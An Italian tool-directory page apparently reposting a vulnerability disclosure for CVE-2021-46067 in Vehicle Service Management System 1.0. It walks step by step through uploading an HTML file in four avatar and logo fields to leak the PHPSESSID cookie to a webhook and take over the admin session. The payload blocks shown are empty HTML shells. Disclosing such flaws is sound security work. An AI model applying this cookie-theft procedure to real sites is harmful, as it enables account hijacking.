Directory degli strumenti
Categorie
Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover — CVE-2021-46067 - In Vehicle Service Management System 1.0 un attaccante può rubare i cookie portando alla completa compromissione dell'account. | Kitploit
Strumenti / GitHub / sanupl / vehicle-service-management-system-multiple-cookie-stealing-leads-to-full-account-takeover
sanupl/vehicle-service-management-system-multiple-cookie-stealing-leads-to-full-account-takeover Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover CVE-2021-46067 - In Vehicle Service Management System 1.0 un attaccante può rubare i cookie portando alla completa compromissione dell'account.
3 4 mesi faScopri gli strumenti più utilizzati dalla nostra community.
Ultimi 7 Giorni Ultimi 30 Giorni
CVE-2021-46067
Titolo dell'exploit: Vehicle Service Management System - 'Multiplo' Furto di Cookie Porta al Completo Dirottamento dell'Account
Autore dell'exploit: SANU P.L
CVE: CVE-2021-46067
CVSS: 9.8 CRITICAL
Riferimenti:
Descrizione: In Vehicle Service Management System 1.0 un attaccante può rubare i cookie portando al completo dirottamento dell'account.
1. Vehicle Service Management System - 'MyAccount' (/admin/?page=user)
Exploit:
Payload: <!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>
</body>
</html>
Salva il codice html qui sopra, ad es.: Cookie Stealing.html
Nella sezione My Account inserisci tutti i dettagli richiesti e seleziona il file html nel campo Avatar.
Fai clic sul pulsante Aggiorna.
Apri l'immagine dell'avatar in una nuova scheda e controlla lo stato del Webhook.
Abbiamo ricevuto la richiesta: contiene PHPSESSID.
Copia il valore di PHPSESSID e apri un altro browser.
Visita il pannello di amministrazione http://localhost/vehicle_service/admin
Controlla i valori dei cookie e sostituisci il valore di PHPSESSID con quello copiato.
Ora accedi al pannello di amministrazione http://localhost/vehicle_service/admin
Accesso all'account riuscito. Dirottamento dell'account completato con successo.
2. Vehicle Service Management System - 'User List' (/admin/?page=user/manage_user)
Exploit:
Payload: <!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>
</body>
</html>
Salva il codice html qui sopra, ad es.: Cookie Stealing.html
Nella sezione Create New User inserisci tutti i dettagli richiesti e seleziona il file html nel campo Avatar.
Fai clic sul pulsante Save.
Apri l'immagine dell'avatar in una nuova scheda e controlla lo stato del Webhook.
Abbiamo ricevuto la richiesta: contiene PHPSESSID.
Copia il valore di PHPSESSID e apri un altro browser.
Visita il pannello di amministrazione http://localhost/vehicle_service/admin
Controlla i valori dei cookie e sostituisci il valore di PHPSESSID con quello copiato.
Ora accedi al pannello di amministrazione http://localhost/vehicle_service/admin
Accesso all'account riuscito. Dirottamento dell'account completato con successo.
3. Vehicle Service Management System - 'Settings-System Logo' (/admin/?page=system_info)
Exploit:
Payload: <!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>
</body>
</html>
Salva il codice html qui sopra, ad es.: Cookie Stealing.html
Nella sezione Settings inserisci tutti i dettagli richiesti e seleziona il file html nel campo System Logo.
Fai clic sul pulsante Aggiorna.
Apri l'immagine System Logo in una nuova scheda e controlla lo stato del Webhook.
Abbiamo ricevuto la richiesta: contiene PHPSESSID.
Copia il valore di PHPSESSID e apri un altro browser.
Visita il pannello di amministrazione http://localhost/vehicle_service/admin
Controlla i valori dei cookie e sostituisci il valore di PHPSESSID con quello copiato.
Ora accedi al pannello di amministrazione http://localhost/vehicle_service/admin
Accesso all'account riuscito. Dirottamento dell'account completato con successo.
4. Vehicle Service Management System - 'Settings-Website Cover' (/admin/?page=system_info)
Exploit:
Payload: <!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>
</body>
</html>
Salva il codice html qui sopra, ad es.: Cookie Stealing.html
Nella sezione Settings inserisci tutti i dettagli richiesti e seleziona il file html nel campo Website Cover.
Fai clic sul pulsante Aggiorna.
Apri l'immagine Website Cover in una nuova scheda e controlla lo stato del Webhook.
Abbiamo ricevuto la richiesta: contiene PHPSESSID.
Copia il valore di PHPSESSID e apri un altro browser.
Visita il pannello di amministrazione http://localhost/vehicle_service/admin
Controlla i valori dei cookie e sostituisci il valore di PHPSESSID con quello copiato.
Ora accedi al pannello di amministrazione http://localhost/vehicle_service/admin
Accesso all'account riuscito. Dirottamento dell'account completato con successo.
Impatto: Un attaccante carica un file html dannoso che reindirizza a un sito web di terze parti e i cookie vengono esposti nella richiesta. Ciò porta al completo dirottamento dell'account.
Mitigazione: Si consiglia di convalidare la funzionalità di upload dei file e di eseguire controlli secondari nella sessione.